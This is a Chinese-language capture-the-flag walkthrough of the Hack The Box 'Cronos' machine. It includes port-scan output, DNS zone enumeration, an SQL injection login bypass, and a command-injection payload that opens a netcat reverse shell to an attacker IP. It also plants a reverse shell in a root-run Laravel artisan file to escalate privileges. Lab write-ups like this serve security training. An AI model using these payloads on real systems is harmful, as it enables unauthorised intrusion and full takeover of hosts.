0x00 Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
╰─ sudo rustscan -a 10.10.10.13  --ulimit 10000  -- -sC -sS -sV -A  
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.10.13:22
Open 10.10.10.13:53
Open 10.10.10.13:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-21 09:11 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.00s elapsed
Initiating Ping Scan at 09:12
Scanning 10.10.10.13 [4 ports]
Completed Ping Scan at 09:12, 0.22s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:12
Scanning ns1.cronos.htb (10.10.10.13) [3 ports]
Discovered open port 53/tcp on 10.10.10.13
Discovered open port 80/tcp on 10.10.10.13
Discovered open port 22/tcp on 10.10.10.13
Completed SYN Stealth Scan at 09:12, 0.22s elapsed (3 total ports)
Initiating Service scan at 09:12
Scanning 3 services on ns1.cronos.htb (10.10.10.13)
Completed Service scan at 09:12, 11.56s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against ns1.cronos.htb (10.10.10.13)
Retrying OS detection (try #2) against ns1.cronos.htb (10.10.10.13)
Initiating Traceroute at 09:12
Completed Traceroute at 09:12, 0.18s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:12
Completed Parallel DNS resolution of 1 host. at 09:12, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
NSE: Script scanning 10.10.10.13.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 8.90s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.73s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.00s elapsed
Nmap scan report for ns1.cronos.htb (10.10.10.13)
Host is up, received echo-reply ttl 63 (0.16s latency).
Scanned at 2024-04-21 09:12:00 EDT for 27s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18b973826f26c7788f1b3988d802cee8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn
| 256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ=
| 256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx
53/tcp open domain syn-ack ttl 63 ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS

這次除了常見的http 80, ssh 22 還出現了 dns 53
感覺53就很有問題,我們用nslookup看看對方ip
過程參考: https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

1
2
3
4
5
6
nslookup
> SERVER 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb

發現給了一個domain name cronos.htb
我們再利用看看dig DNS 他會不會吐出其他subdomaion

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
╰─ dig any cronos.htb @10.10.10.13

; <<>> DiG 9.19.21-1-Debian <<>> any cronos.htb @10.10.10.13
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38142
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb. IN ANY

;; ANSWER SECTION:
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13

;; ADDITIONAL SECTION:
ns1.cronos.htb. 604800 IN A 10.10.10.13

;; Query time: 188 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Sun Apr 21 09:29:52 EDT 2024
;; MSG SIZE rcvd: 131

非常順利的拿到了一個叫 admin 的 subdomain
把 domain 和 ip 寫到 /etc/hosts 就可以正常訪問網頁了

0x01 SQLI to Login

在進到admin 後我們會看到這個簡陋的登入畫面

在經過觀察html 和 封包後大概確定這不是什麼CMS,是作者自己寫的登入頁面
這也意味著我們要自己打洞

但最後隨手甩了一個萬用密碼就進去了 笑死

1
2
username: admin' or 1 = 1 -- -
password: admin' or 1 = 1 -- -

0x02 Command Injection

登入後我們會看到這個畫面

這看起來就很有Command Injection的機會
直接上payload試試

1
ping ;busybox nc 10.10.xxx.xxx 1111 -e /bin/bash

我們就可以拿到reverseshell 了

0x03 Privilege Escalation

進入後發現自己只是www-html
經過基本的檢查發現沒什麼能利用的
因此使用linpeas 幫我們蒐集資訊

1
2
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

我們看到了這個有趣cron job
檔案在/var/www/ 我們可以去替換掉該檔案
我們先把/var/www/laravel/artisan先拿出來
在最上面加上 reverse shell payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
exec('busybox nc 10.10.xxx.xxx 8888 -e /bin/bash');
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';

/*
...

之後把修改後的檔案替換/var/www/laravel/artisan
然後靜待root執行我們的payload
這樣就拿到root了
我們可以在root下拿到root.txt,

1
2
3
root@cronos:~# cat root*
cat root*
9fxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1
2
3
root@cronos:/home/noulis# cat user*
cat user*
78xxxxxxxxxxxxxxxxxxxxxxxxxxxx